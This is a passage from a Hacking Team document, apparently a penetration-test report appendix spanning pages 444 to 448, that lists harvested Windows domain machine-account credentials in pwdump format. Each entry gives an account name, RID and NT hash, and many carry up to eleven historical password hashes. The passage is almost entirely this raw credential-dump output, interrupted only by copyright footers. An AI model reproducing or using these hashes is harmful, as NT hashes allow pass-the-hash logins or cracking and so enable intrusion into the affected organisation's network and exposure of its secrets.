CPIETROLUONGO$_history_10:4608:NO PASSWORD*********************:2F066252A71470E783CEE352A322079B:::
PDIRUSCIO$:4614:NO PASSWORD*********************:389358633EAC133A6BF574B8143AF7AF:::
PDIRUSCIO$_history_0:4614:NO PASSWORD*********************:2F2854D3662EAE727AA9C359C309CD30:::
PDIRUSCIO$_history_1:4614:NO PASSWORD*********************:7C8EBCDBC0C2071588832C8616AE0DE5:::
PDIRUSCIO$_history_2:4614:NO PASSWORD*********************:1CE81DC7785208FE1965BE397B5FDEBE:::
PDIRUSCIO$_history_3:4614:NO PASSWORD*********************:D5FA8190A7706B59391DEE6E9088B7E4:::
PDIRUSCIO$_history_4:4614:NO PASSWORD*********************:0B976B0CCE3A6648E3F04BEEDBB57EB6:::
PDIRUSCIO$_history_5:4614:NO PASSWORD*********************:444C7BEB8D11CF1553D5530D6607B0E2:::
PDIRUSCIO$_history_6:4614:NO PASSWORD*********************:C06769D5AF51E2A79EF7C8257039DE3C:::
PDIRUSCIO$_history_7:4614:NO PASSWORD*********************:07C21F320773CF6859012DD2825B4768:::
PDIRUSCIO$_history_8:4614:NO PASSWORD*********************:6003BC889428FF52314265D9BE924A89:::
PDIRUSCIO$_history_9:4614:NO PASSWORD*********************:46EB0A94B69C08243B1F3A090DCBEF9F:::
PDIRUSCIO$_history_10:4614:NO PASSWORD*********************:BB39E8B72BD9106D96505AEA60F6F8EF:::
ROMLAP-TMP$:4615:NO PASSWORD*********************:636F9CDF78B218322706B72A34988516:::
ROMLAP-TMP$_history_0:4615:NO PASSWORD*********************:A320A1B46571A02D6A065B413483CD12:::
ROMLAP-TMP$_history_1:4615:NO PASSWORD*********************:FB991541E0EC2B39036A6543558DD7C2:::
ROMLAP-TMP$_history_2:4615:NO PASSWORD*********************:0D2F0CCBCD78DC31722A7CF49619AD86:::
ROMLAP-TMP$_history_3:4615:NO PASSWORD*********************:327EC5B4BC81C9E123123C43A2DE73A0:::
ROMLAP-TMP$_history_4:4615:NO PASSWORD*********************:80513FCEB2C406F86F8B6D797962E692:::
ROMLAP-TMP$_history_5:4615:NO PASSWORD*********************:CA43F4A295F38A4A9092CDC73E25DA52:::
ROMLAP-TMP$_history_6:4615:NO PASSWORD*********************:695CA5110E3C3DA75F31E005FA753B94:::
ROMLAP-TMP$_history_7:4615:NO PASSWORD*********************:0046CA6E49E32F1EF265E59367757240:::
ROMLAP-TMP$_history_8:4615:NO PASSWORD*********************:1A99E2BB4B99F3CCFA730E83EAEA649B:::
ROMLAP-TMP$_history_9:4615:NO PASSWORD*********************:BAF8736F2A2A8D9853F0C52B37417608:::
ROMLAP-TMP$_history_10:4615:NO PASSWORD*********************:FEDEDE2CC60997FB0C6AEF1BCC64CF16:::
TBAROZZI$:4618:NO PASSWORD*********************:749473219AC1D99AD712EE7A8DC7FA34:::
TBAROZZI$_history_0:4618:NO PASSWORD*********************:E388DB7746F4CBC533B4309061D6CF00:::
TBAROZZI$_history_1:4618:NO PASSWORD*********************:49CAA48F8DF198F640C8BB191E43237A:::
TBAROZZI$_history_2:4618:NO PASSWORD*********************:C970FF0338A42D3739F1DD7511D2A61A:::
TBAROZZI$_history_3:4618:NO PASSWORD*********************:9F17FD89065F4D9A4F95912C4D7D1FC5:::
MTS-F9BA2EB7154$:4621:NO PASSWORD*********************:9C24001A5853A91C6B27C14D8ED05E27:::
SERVER-68D89A83$:4623:NO PASSWORD*********************:8B424536A52CDA49A4A74AD4D12251AB:::
SERVER-68D89A83$_history_0:4623:NO PASSWORD*********************:A11939DD65CFB312BCFBFB445FE42079:::
SERVER-68D89A83$_history_1:4623:NO PASSWORD*********************:2CA77CF24A72449F84649376624A4A6C:::
SERVER-68D89A83$_history_2:4623:NO PASSWORD*********************:10860025C6B2DC451B35FB48391A14AE:::
SERVER-68D89A83$_history_3:4623:NO PASSWORD*********************:2AD7C53EF839B9367CE7A1B7A6BE7141:::
SERVER-68D89A83$_history_4:4623:NO PASSWORD*********************:8A8E9110D52A27E3A2CCC01B7F356272:::
SERVER-68D89A83$_history_5:4623:NO PASSWORD*********************:27F3664ACC14A366800D6C2FF96C581B:::
MPRIMAVERA-OLD$:4624:NO PASSWORD*********************:8C6E4DA1534911E1D0315AD1E18090C5:::
RW0245$:6104:NO PASSWORD*********************:42B22E1EB91CFD1C4CAE9B4E88B7E429:::
RW0245$_history_0:6104:NO PASSWORD*********************:0C468FE4AF261267A90DE57736A813FA:::
RW0245$_history_1:6104:NO PASSWORD*********************:A9B7321EB9ED74499F814CACDD59BA58:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 444 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
RW0245$_history_2:6104:NO PASSWORD*********************:13B79BABC32F143D5EBB1410C9774A5B:::
RW0245$_history_3:6104:NO PASSWORD*********************:6818819340F31C77652981A35372FD77:::
RW0245$_history_4:6104:NO PASSWORD*********************:E3DB80148427641D5B17645D9C61A547:::
RW0245$_history_5:6104:NO PASSWORD*********************:03AD2DEEC5271B902E09AD62A521A56E:::
RW0245$_history_6:6104:NO PASSWORD*********************:D0D0D949F03A5A86B5FD0E8985AB3F8A:::
RW0245$_history_7:6104:NO PASSWORD*********************:7D7DC3F349691666BC756514E38B5666:::
RW0245$_history_8:6104:NO PASSWORD*********************:B6F24BA58E80D57044C7390C30936CDA:::
RW0245$_history_9:6104:NO PASSWORD*********************:6DD090D425828708CE0DC2A5BFD5AF29:::
RW0245$_history_10:6104:NO PASSWORD*********************:2657D0D3C21CB371F9B6BD49647C3D29:::
C400-0073$:6105:NO PASSWORD*********************:88F015636DA1951A9C5B31072C6A2F6C:::
C400-0038$:6106:NO PASSWORD*********************:6D370EF1EFE1B300BB4E5D6C646FAE7A:::
C400-0038$_history_0:6106:NO PASSWORD*********************:EA1BC02BA6D444F7197A8EC329E5D78B:::
C400-0038$_history_1:6106:NO PASSWORD*********************:85F65E51FB3F46E75D480FF7A164CD89:::
C400-0038$_history_2:6106:NO PASSWORD*********************:E9181EF669DB8A696EF1A83C87811A7A:::
CS0063$:6116:NO PASSWORD*********************:8195678E964F0894E80B70F6DC7C1D7C:::
CS0063$_history_0:6116:NO PASSWORD*********************:32FDBB5FAEBFA8D42456EF944041EE31:::
CS0063$_history_1:6116:NO PASSWORD*********************:BD1B624309949850815C3260BA12116A:::
CS0063$_history_2:6116:NO PASSWORD*********************:02318F163C7B708F9D37C1BAD3CB0EA0:::
CS0063$_history_3:6116:NO PASSWORD*********************:4E82D78730DF9A189503295C1B5710EB:::
CS0063$_history_4:6116:NO PASSWORD*********************:09FF56AF1B6DDE9DD6F921D3EE127637:::
CS0063$_history_5:6116:NO PASSWORD*********************:C9239B3D26B54501D50499AB103334FE:::
CS0063$_history_6:6116:NO PASSWORD*********************:DE3E9FA774E7D145193922866393708A:::
CS0063$_history_7:6116:NO PASSWORD*********************:946503AF02473898056239042477CA20:::
CS0063$_history_8:6116:NO PASSWORD*********************:EC9B6B9D7B3C5B7034DA59B2ECDBF822:::
CS0063$_history_9:6116:NO PASSWORD*********************:F8D8B443C1933F65FD7E5136BC406D24:::
CS0063$_history_10:6116:NO PASSWORD*********************:F64916CD3DE5AC966A625CBDF6869F18:::
BT0247$:6117:NO PASSWORD*********************:509E054ECE5813231405BE204112F681:::
BT0247$_history_0:6117:NO PASSWORD*********************:5B72DC6829C881FA20A7239BAF5557F4:::
BT0247$_history_1:6117:NO PASSWORD*********************:5BEE22D2A0232698B8095B86C3E03221:::
BT0247$_history_2:6117:NO PASSWORD*********************:2EB40F455F96433AFA490DD1D71C647B:::
BT0247$_history_3:6117:NO PASSWORD*********************:B00F6EC922D5AA81AAD76DC4436CD18C:::
BT0247$_history_4:6117:NO PASSWORD*********************:BF285845CE341E2EF3799CA9815AAB63:::
BT0247$_history_5:6117:NO PASSWORD*********************:C87FDF4FD6DEA2E6AEE2F1AA93162A18:::
BT0247$_history_6:6117:NO PASSWORD*********************:FA8960AD6155A8C431F16D20B806714D:::
BT0247$_history_7:6117:NO PASSWORD*********************:3ADF4F39E8DFF89290D8DC6BE5E0E036:::
BT0247$_history_8:6117:NO PASSWORD*********************:B68540007ACAF9C81EA2CEB6A6F5027A:::
BT0247$_history_9:6117:NO PASSWORD*********************:E76C567FEEC4B10C5DB7FA2582808A75:::
BT0247$_history_10:6117:NO PASSWORD*********************:DFD7FEE0E4E223E835A82565FBF28334:::
LL0056$:6118:NO PASSWORD*********************:C32EFCA1ED68E8C77B58A2D6E16E359F:::
LL0056$_history_0:6118:NO PASSWORD*********************:5DB4E2BC293C674735B2E65B299C02C0:::
LL0056$_history_1:6118:NO PASSWORD*********************:B43F89C52FD5D54B498F5A6EF77DA397:::
LL0056$_history_2:6118:NO PASSWORD*********************:43CD92ABC21AD3F2366AB24BE0CDCBD4:::
LL0056$_history_3:6118:NO PASSWORD*********************:A0FF98B682A6E497530354360FF6FA5B:::
LL0056$_history_4:6118:NO PASSWORD*********************:96B93BD589ADA3C7F40C992C7B81F2E8:::
LL0056$_history_5:6118:NO PASSWORD*********************:B0179B5DB304AB1CB9D2388F5D4C8A41:::
LL0056$_history_6:6118:NO PASSWORD*********************:5FC566CC503CF466D51C136FF164E5EB:::
LL0056$_history_7:6118:NO PASSWORD*********************:72DBE551AE7BDB71A4F5482E90174005:::
LL0056$_history_8:6118:NO PASSWORD*********************:088CA9C4BB3933394E51696A632F69B6:::
LL0056$_history_9:6118:NO PASSWORD*********************:548C7E7EFC0BFF077444A73430D2CB69:::
LL0056$_history_10:6118:NO PASSWORD*********************:CE158C082FE17ED60A723F28C04E37A4:::
AS0393$:6119:NO PASSWORD*********************:0FD834CF5A7D857F38422AC5BD76A0AF:::
AS0393$_history_0:6119:NO PASSWORD*********************:3FFACC741014EDBC5F64F1583A68D4D9:::
AS0393$_history_1:6119:NO PASSWORD*********************:9A084555A9447B4A324C7547DBFB0DBA:::
AS0393$_history_2:6119:NO PASSWORD*********************:074A4E7C5472F83904D7424DF5187E39:::
AS0393$_history_3:6119:NO PASSWORD*********************:63C1DF678596951CB40123DF8407D236:::
AS0393$_history_4:6119:NO PASSWORD*********************:13BE68F8FCD4A9C27069FE1762A05A3F:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 445 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
AS0393$_history_5:6119:NO PASSWORD*********************:8431FFD88EF67D4F40945AFF68A0C65B:::
AS0393$_history_6:6119:NO PASSWORD*********************:7DF5A67629389E8902242772010EA387:::
AS0393$_history_7:6119:NO PASSWORD*********************:91FF22D3DF43EB3F1A678D66B1CFC1B3:::
AS0393$_history_8:6119:NO PASSWORD*********************:F2AAE0E9C24CEB2B50CFB8324E051FC3:::
AS0393$_history_9:6119:NO PASSWORD*********************:9D786D709C2BAB9A51642B1F120A279A:::
AS0393$_history_10:6119:NO PASSWORD*********************:DA1794F3C15E529B29BBCC9D596F1412:::
PF0020$:6120:NO PASSWORD*********************:D7D0A2B055B803E3E97DCD0AF8DB4A6A:::
PF0020$_history_0:6120:NO PASSWORD*********************:57A00A8D12841082257A4D4C19C8463C:::
PF0020$_history_1:6120:NO PASSWORD*********************:918DF0CF64D8FC2493957508A92BD9C1:::
PF0020$_history_2:6120:NO PASSWORD*********************:2E7E3FE126423F262246AA2F959F09BC:::
PF0020$_history_3:6120:NO PASSWORD*********************:E209547AAE0C5A8C11DD6FB2E2CA5F62:::
PF0020$_history_4:6120:NO PASSWORD*********************:2DF75E33908C3A4478EC42C788F902DD:::
PF0020$_history_5:6120:NO PASSWORD*********************:46A9273317DCBC6F00704E03DA43E655:::
PF0020$_history_6:6120:NO PASSWORD*********************:604D8EDEC78D0D24B37169F01EADEB03:::
PF0020$_history_7:6120:NO PASSWORD*********************:16735C095BD324A4AF15F193054FAC0E:::
PF0020$_history_8:6120:NO PASSWORD*********************:7EE7C66F54F257219F02ADE569EE0157:::
PF0020$_history_9:6120:NO PASSWORD*********************:4D92EA2744712CDDB209241ACDAC97F1:::
PF0020$_history_10:6120:NO PASSWORD*********************:E7D1197E26ACA32414154E242E341C78:::
JG0249$:6121:NO PASSWORD*********************:54B9AE87016796680895621723A14503:::
JG0249$_history_0:6121:NO PASSWORD*********************:0DE779E9A58DAE8D9786B9CC9578292F:::
JG0249$_history_1:6121:NO PASSWORD*********************:07A4E098E7A149E033A4CDD1724282A9:::
JG0249$_history_2:6121:NO PASSWORD*********************:8B99D7279F173512603507362B8D2228:::
JG0249$_history_3:6121:NO PASSWORD*********************:07AA90B850997B9FCFE6FF421710B33B:::
JG0249$_history_4:6121:NO PASSWORD*********************:9569EDA4CFD596508A8094E138B9D3BE:::
JG0249$_history_5:6121:NO PASSWORD*********************:D90668EF3B43FC031D7C589C732EF536:::
JG0249$_history_6:6121:NO PASSWORD*********************:BFEA890BC6362291239ACF1449FD73B6:::
JG0249$_history_7:6121:NO PASSWORD*********************:917B821F1BB48A96998F7D970DC4A93B:::
JG0249$_history_8:6121:NO PASSWORD*********************:D8CFDD32B239BBBF65D30F09B339E464:::
JG0249$_history_9:6121:NO PASSWORD*********************:F132ED3E8FAAD86241B99A84E336370F:::
JG0249$_history_10:6121:NO PASSWORD*********************:860C060F4DA722568715B4F52FCABCB5:::
AC0023$:6122:NO PASSWORD*********************:1DA7AA0393B3845164063FAD79D62A2C:::
AC0023$_history_0:6122:NO PASSWORD*********************:7A2F1DA3161046E9C3A361A2B7ACC09E:::
AC0023$_history_1:6122:NO PASSWORD*********************:4276B4436FD6CF2D33F748FA249AAEA6:::
AC0023$_history_2:6122:NO PASSWORD*********************:C985F47074E6A3484E1E7161FE91AAAC:::
AC0023$_history_3:6122:NO PASSWORD*********************:601C1C0844E31F3A149594AFB03E7C8E:::
AC0023$_history_4:6122:NO PASSWORD*********************:0A3E5609F0FCE9D3C8072CE874D2E002:::
AC0023$_history_5:6122:NO PASSWORD*********************:EF39304F5473B2D3291735B5D311165A:::
AC0023$_history_6:6122:NO PASSWORD*********************:3AD402C47E0F9839DAB23AE20D8687A8:::
AC0023$_history_7:6122:NO PASSWORD*********************:508F0609BB14A3DA6640B325F2A59FC7:::
TH0006$:6123:NO PASSWORD*********************:8A89AF758AAB4CE20FA2EA2626C42528:::
TH0006$_history_0:6123:NO PASSWORD*********************:AF6AACD99464684341931D0E0143D082:::
TH0006$_history_1:6123:NO PASSWORD*********************:2F77092AF1CAD029F7B5F3C876D93497:::
TH0006$_history_2:6123:NO PASSWORD*********************:359FAAF2705CCA4DF35F66BF60AC807E:::
TH0006$_history_3:6123:NO PASSWORD*********************:55E2408C4DA07BEFE8A071A88B36D36D:::
TH0006$_history_4:6123:NO PASSWORD*********************:29DABAE1DD1D3A2E49302AE3010D35F2:::
TH0006$_history_5:6123:NO PASSWORD*********************:D30D34FB6150B173BFAD585A77A1DF51:::
TH0006$_history_6:6123:NO PASSWORD*********************:A6767894FEB4B932DCBE47561E447256:::
TH0006$_history_7:6123:NO PASSWORD*********************:A81C8524D9D77E8B0A423E4AE54C2E20:::
TH0006$_history_8:6123:NO PASSWORD*********************:848F8730F86CF1DF4F6A9BC1A15FB0AC:::
TH0006$_history_9:6123:NO PASSWORD*********************:2BAEFB697294DCD05DA89E14D5F14BAA:::
TH0006$_history_10:6123:NO PASSWORD*********************:B3393EC2AEF9748F118E331D9916B5FA:::
SD0012$:6124:NO PASSWORD*********************:C6B00585248610356B19B085229300D9:::
SD0012$_history_0:6124:NO PASSWORD*********************:A7190BE6C58B77A0353E5C6E1BF54388:::
SD0012$_history_1:6124:NO PASSWORD*********************:91069FFA6503BFD27806DD1AFB64F2A9:::
SD0012$_history_2:6124:NO PASSWORD*********************:26291849241DC62F28A6D70DCAF68F74:::
SD0012$_history_3:6124:NO PASSWORD*********************:A13D9E9D43A9EF2326C5115204B84A74:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 446 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
SD0012$_history_4:6124:NO PASSWORD*********************:3D1B592D2076C580ABB915B8C8331A95:::
SD0012$_history_5:6124:NO PASSWORD*********************:906ADCD2E3CBF38459171E0882D9E558:::
SD0012$_history_6:6124:NO PASSWORD*********************:9CA454775F58D432285916ECF2C97556:::
SD0012$_history_7:6124:NO PASSWORD*********************:507F85E25DE9AC127BDDC825D85419F3:::
SD0012$_history_8:6124:NO PASSWORD*********************:C6C1BA2710A7F79B036A8DC16962B65E:::
SD0012$_history_9:6124:NO PASSWORD*********************:9BE02CC4CBEEF8A0AE83F5E54693FF24:::
SD0012$_history_10:6124:NO PASSWORD*********************:65FAF65A5E36A0A02C355B47A123A298:::
EC0405$:6125:NO PASSWORD*********************:6AF05001ADE689AE821BC87269E93E81:::
EC0405$_history_0:6125:NO PASSWORD*********************:0ED2535A113DAC293E25EB70F6D619AE:::
EC0405$_history_1:6125:NO PASSWORD*********************:5144B53CFAD1BB129616C0A22CF8C5D5:::
EC0405$_history_2:6125:NO PASSWORD*********************:3D2C9D74F748BBFCB8686687C4AA22FC:::
EC0405$_history_3:6125:NO PASSWORD*********************:0CFD19655FF2BA3D65B8B7B72C42DCF1:::
EC0405$_history_4:6125:NO PASSWORD*********************:7970DB87E45E0EA7DE3AE072E446D468:::
EC0405$_history_5:6125:NO PASSWORD*********************:AF852EB6B075B8504C8BD5A8D3B7AC8B:::
EC0405$_history_6:6125:NO PASSWORD*********************:3056C5DC56D99BAA007AE0A422A17108:::
EC0405$_history_7:6125:NO PASSWORD*********************:612AE6C62756E050BB4719333B676509:::
EC0405$_history_8:6125:NO PASSWORD*********************:6A02373B1E304E686CE26007B1C2CFB3:::
EC0405$_history_9:6125:NO PASSWORD*********************:69C26C187EB8D99055A9400A673F6AE0:::
EC0405$_history_10:6125:NO PASSWORD*********************:4C5EA85C3208A1CC40A3866C6835D246:::
TN0265$:6126:NO PASSWORD*********************:8D6732AFC783665C055ACF4108AF6703:::
TN0265$_history_0:6126:NO PASSWORD*********************:DCD3B944C415DFC43C2FC7EF268CD4D3:::
TN0265$_history_1:6126:NO PASSWORD*********************:B80331A2546F658821558AF89DF1464F:::
TN0265$_history_2:6126:NO PASSWORD*********************:F4FFED23740D241BDF052EF571FF5079:::
TN0265$_history_3:6126:NO PASSWORD*********************:016DF78E8160D31D6F0C1EE21D09C342:::
TN0265$_history_4:6126:NO PASSWORD*********************:7A50AEB34EF14FA01A0811C3100A6D11:::
TN0265$_history_5:6126:NO PASSWORD*********************:BFB7449F616B83E2A07CE926F320776A:::
TN0265$_history_6:6126:NO PASSWORD*********************:8CE6B293EDBD38D7A22C2E974B61091B:::
TN0265$_history_7:6126:NO PASSWORD*********************:D43EDCF997B45ECFE5ECD7531B760BA1:::
TN0265$_history_8:6126:NO PASSWORD*********************:1543CB2923874BD79D4B0AE99F3572F9:::
TN0265$_history_9:6126:NO PASSWORD*********************:12AD0774AD8507CA5FBFE0E57D611D84:::
TN0265$_history_10:6126:NO PASSWORD*********************:5C77F65F79E6823E6221707D0890839B:::
TT0248$:6127:NO PASSWORD*********************:334740FB7419245D2A072FA5349CB6D7:::
TT0248$_history_0:6127:NO PASSWORD*********************:1028A0C0183C749095FC6909E6B947A2:::
TT0248$_history_1:6127:NO PASSWORD*********************:2A563BC938BBB3D11B85FF3324F83F15:::
TT0248$_history_2:6127:NO PASSWORD*********************:C805BDD2F4C3652D0BAA88BF38C71DCF:::
TT0248$_history_3:6127:NO PASSWORD*********************:565BC4CF644501768B71325F963FCE06:::
TT0248$_history_4:6127:NO PASSWORD*********************:14A547FDE6A0A1591B0C123770308FB4:::
TT0248$_history_5:6127:NO PASSWORD*********************:E9CECADDAABF8E36E6563AB7C62F6811:::
TT0248$_history_6:6127:NO PASSWORD*********************:BAD8C252A05643E593C5B1691CA4087D:::
TT0248$_history_7:6127:NO PASSWORD*********************:0CB166130C38333950AAFC0278573574:::
TT0248$_history_8:6127:NO PASSWORD*********************:40630BE90C863906DA54A32093FD64CA:::
TT0248$_history_9:6127:NO PASSWORD*********************:37B9C00482228C9CD45A468E4B740F87:::
TT0248$_history_10:6127:NO PASSWORD*********************:07C84978C87CF3940F5FD0691791C571:::
AC0370$:6128:NO PASSWORD*********************:ECCF14B96056C7EA3DE824DE0CF740CF:::
AC0370$_history_0:6128:NO PASSWORD*********************:B875AE1F54C0A58B418029D507721410:::
AC0370$_history_1:6128:NO PASSWORD*********************:320B5D11FC9F719A5F21ED57628DF15D:::
AC0370$_history_2:6128:NO PASSWORD*********************:656B13D16308C764ADA3B657B5167B03:::
AC0370$_history_3:6128:NO PASSWORD*********************:0450BC2964B2059C505EB5F2EFEB6ACD:::
AC0370$_history_4:6128:NO PASSWORD*********************:2708C2D74E392068450B77BF37F80CBB:::
AC0370$_history_5:6128:NO PASSWORD*********************:7E07B7505F7213D84856C50E685A60C2:::
AC0370$_history_6:6128:NO PASSWORD*********************:BDC349F98155EEC23730127A59AC872D:::
AC0370$_history_7:6128:NO PASSWORD*********************:7DE64247BFF0607801D9A9628EFB8127:::
AC0370$_history_8:6128:NO PASSWORD*********************:4AF71AC2B19C0F9B36D23DACC11C385B:::
AC0370$_history_9:6128:NO PASSWORD*********************:BC68DE94907C4C6F020F7284A77D5D01:::
AC0370$_history_10:6128:NO PASSWORD*********************:1E3F398DF1B31DFEF6F485591359C20E:::
EC0031$:6129:NO PASSWORD*********************:3B1D879DCC75E43D7EA5B3D81968BB76:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 447 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
EC0031$_history_0:6129:NO PASSWORD*********************:E95118532640DC1CB27B8EB76C718271:::
EC0031$_history_1:6129:NO PASSWORD*********************:2BA3CA5A59A195E3F5F41E190DA9173A:::
EC0031$_history_2:6129:NO PASSWORD*********************:2C41F0B4027E9ACDA8D03F1F1CF5997F:::
EC0031$_history_3:6129:NO PASSWORD*********************:7B7086A30EA13BDBB766CB652F268D4E:::
EC0031$_history_4:6129:NO PASSWORD*********************:AF1032D6F29DD15DE3432962AA114A68:::
EC0031$_history_5:6129:NO PASSWORD*********************:CF2E44B6757E2EB988489057C7EB1DC4:::
EC0031$_history_6:6129:NO PASSWORD*********************:23CDA8EA53F1ED138C16CDB7E213F4D5:::
EC0031$_history_7:6129:NO PASSWORD*********************:E72928E2C6E13EADD4BEBE6F6BB44E21:::
EC0031$_history_8:6129:NO PASSWORD*********************:2908FB5F965A345558E3A39D13A98A3E:::
EC0031$_history_9:6129:NO PASSWORD*********************:D7C6DD64AF892433E394758EF972D640:::
EC0031$_history_10:6129:NO PASSWORD*********************:4BE942E5E5CECE5C9A47B9EC37F3729D:::
PF0050$:6130:NO PASSWORD*********************:D0AB38110930C0D81B56DEA87A15D668:::
PF0050$_history_0:6130:NO PASSWORD*********************:EBA7D91183FBDF227EF94B11CD72D2DD:::
PF0050$_history_1:6130:NO PASSWORD*********************:C4D8D87A192B28BFCA9D3CDA6FAEE63A:::
PF0050$_history_2:6130:NO PASSWORD*********************:3D8A71E6E5C49EFEAECD3932035F418A:::
PF0050$_history_3:6130:NO PASSWORD*********************:1359F88C7206C9D1AA3753A1AF4FFB42:::
PF0050$_history_4:6130:NO PASSWORD*********************:16F47628FF2238201CDABCB9C4ABC869:::
PF0050$_history_5:6130:NO PASSWORD*********************:CD704CB3DD0BD65512C5780C18F3870C:::
PF0050$_history_6:6130:NO PASSWORD*********************:334F846DC6D027588249860BC0B93172:::
PF0050$_history_7:6130:NO PASSWORD*********************:0459B1D5403C4BE76EA32717811611B9:::
PF0050$_history_8:6130:NO PASSWORD*********************:E6724A14747BA7272412AD2FC0FC01B4:::
PF0050$_history_9:6130:NO PASSWORD*********************:74ED27D9972D0513E4D5861D86E860B4:::
PF0050$_history_10:6130:NO PASSWORD*********************:FA5E8ED84BD037B53A1714749A1C157B:::
CS0397$:6131:NO PASSWORD*********************:8372424F6724C17F7E2743E9E1ED2851:::
CS0397$_history_0:6131:NO PASSWORD*********************:FB6771477561EF3185A36DFFB4BBBCAE:::
CS0397$_history_1:6131:NO PASSWORD*********************:852711A9DB291AD7506380468907D535:::
CS0397$_history_2:6131:NO PASSWORD*********************:DA9A5982D850C290F795372829F27B6A:::
CS0397$_history_3:6131:NO PASSWORD*********************:CD366417EE9678787CA374FE1CC14045:::
CS0397$_history_4:6131:NO PASSWORD*********************:850D58A83BCE68F35CA09CD10CE498DD:::
CS0397$_history_5:6131:NO PASSWORD*********************:ABEA292A2DBB7A2F40A241072906B3F7:::
CS0397$_history_6:6131:NO PASSWORD*********************:6E87C774C7D92413080ABDD7A5E8225D:::
CS0397$_history_7:6131:NO PASSWORD*********************:75C28E8937103C2970B47F602CC67AF6:::
CS0397$_history_8:6131:NO PASSWORD*********************:E2210746A6FED983200A6003B060A076:::
CS0397$_history_9:6131:NO PASSWORD*********************:220C234B9E7B73AA894F37B1A7B15C05:::
CS0397$_history_10:6131:NO PASSWORD*********************:2F8110D5C10A253661937DABFC05DD9B:::
MD0251$:6132:NO PASSWORD*********************:1DD919C76D8622BB48326EE48C74D196:::
MD0251$_history_0:6132:NO PASSWORD*********************:1608B6C8F6247BE9796213D44185EFE4:::
MD0251$_history_1:6132:NO PASSWORD*********************:D8A3061F49B5D47306FC75FB1E4A0FB9:::
MD0251$_history_2:6132:NO PASSWORD*********************:F94842CC6BDA27EDD2760404E0778787:::
MD0251$_history_3:6132:NO PASSWORD*********************:E0CDF6D5C1362857C7A53EDD4D21B9B4:::
MD0251$_history_4:6132:NO PASSWORD*********************:CB81A6BC3875C0BC10B360E3798BDC77:::
MD0251$_history_5:6132:NO PASSWORD*********************:1B2AE71AC30FAB3D0F1543C3EA61B839:::
MD0251$_history_6:6132:NO PASSWORD*********************:A9FAD7CD9FFC531B504D826CE5B2A5C7:::
MD0251$_history_7:6132:NO PASSWORD*********************:7AF211E4D25FA81D1213E4F22D159F1D:::
MD0251$_history_8:6132:NO PASSWORD*********************:B28CFFF22437B85E30E349D88469A39D:::
MD0251$_history_9:6132:NO PASSWORD*********************:0950D5AD29275A3775228DB6FC0D46E4:::
MD0251$_history_10:6132:NO PASSWORD*********************:32087F8969BFC5259DD1CB9CDB2CD12C:::
SS0005$:6133:NO PASSWORD*********************:F3A398CB89F2F56EBCC8600865E3CFCE:::
LR0008$:6134:NO PASSWORD*********************:8C24970905384C62BC3B77F803DAC7B6:::
LR0008$_history_0:6134:NO PASSWORD*********************:C5568BCAD860163539EF0B4945DC0100:::
LR0008$_history_1:6134:NO PASSWORD*********************:3E833521D630C77BB01950E32CCA0959:::
LR0008$_history_2:6134:NO PASSWORD*********************:39971D68D21EA27381511BC2F4D6C244:::
LR0008$_history_3:6134:NO PASSWORD*********************:A20E3C8EA853EBF5A71786791E35C788:::
LR0008$_history_4:6134:NO PASSWORD*********************:505B065CC1E69AC0E4BA462CCE74E1C9:::
LR0008$_history_5:6134:NO PASSWORD*********************:13F08D03DE144EE32BE1927F58F2EA9C:::
LR0008$_history_6:6134:NO PASSWORD*********************:3C35CF1617A4DBABDED7B9E4E1A50801:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 448 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LR0008$_history_7:6134:NO PASSWORD*********************:76B43392F0B812B9DDA78BBEE58A15B9:::
LR0008$_history_8:6134:NO PASSWORD*********************:C0238A5B8B40DACBB055EF9DC2F91A99:::
LR0008$_history_9:6134:NO PASSWORD*********************:C9764937EF11DA6A2F817B9EDE2C1F5B:::
LR0008$_history_10:6134:NO PASSWORD*********************:718F5E35723E618D59A0D49D5CC19285:::
LONTEST0103$:6138:NO PASSWORD*********************:0FCABC8F43C9BEDFF0EBDF86A99E1995:::
LONTEST0103$_history_0:6138:NO PASSWORD*********************:97D83B71F174EC2380F2AD1D97140240:::
LONTEST0103$_history_1:6138:NO PASSWORD*********************:56B66501E91F68EF191327E96E5E2A0F:::
LONTEST0103$_history_2:6138:NO PASSWORD*********************:5983F8B8B2E19FE044AAE65827D06B62:::
LONTEST0103$_history_3:6138:NO PASSWORD*********************:74188505594F0641C7F145C718290F95:::
LONTEST0103$_history_4:6138:NO PASSWORD*********************:8E1AA9314ABEDED7A40C6240D95257C1:::
LONTEST0103$_history_5:6138:NO PASSWORD*********************:2D662E60BF7844D14561A09FEF3DDCC6:::
LONTEST0103$_history_6:6138:NO PASSWORD*********************:CED214772513F7486BAFB7517DD87D6C:::
LONTEST0103$_history_7:6138:NO PASSWORD*********************:5AFF6C87BCDFC86E2EB7B5FA858796FA:::
LONTEST0103$_history_8:6138:NO PASSWORD*********************:C5AC2C81F9CFF47F3FBAEE0FF39B53E8:::
LONTEST0103$_history_9:6138:NO PASSWORD*********************:D893B58BDC4F8FB569D68F82FCB7FF04:::
LONTEST0103$_history_10:6138:NO PASSWORD*********************:E6345FF8D9DB4C3738D980FCC4BB0D5C:::
FT0017$:6139:NO PASSWORD*********************:2139DF6CDC086B65BFC23469ABB4DFF4:::
FT0017$_history_0:6139:NO PASSWORD*********************:046687D1DA351C3BA7D86E97A2191D99:::
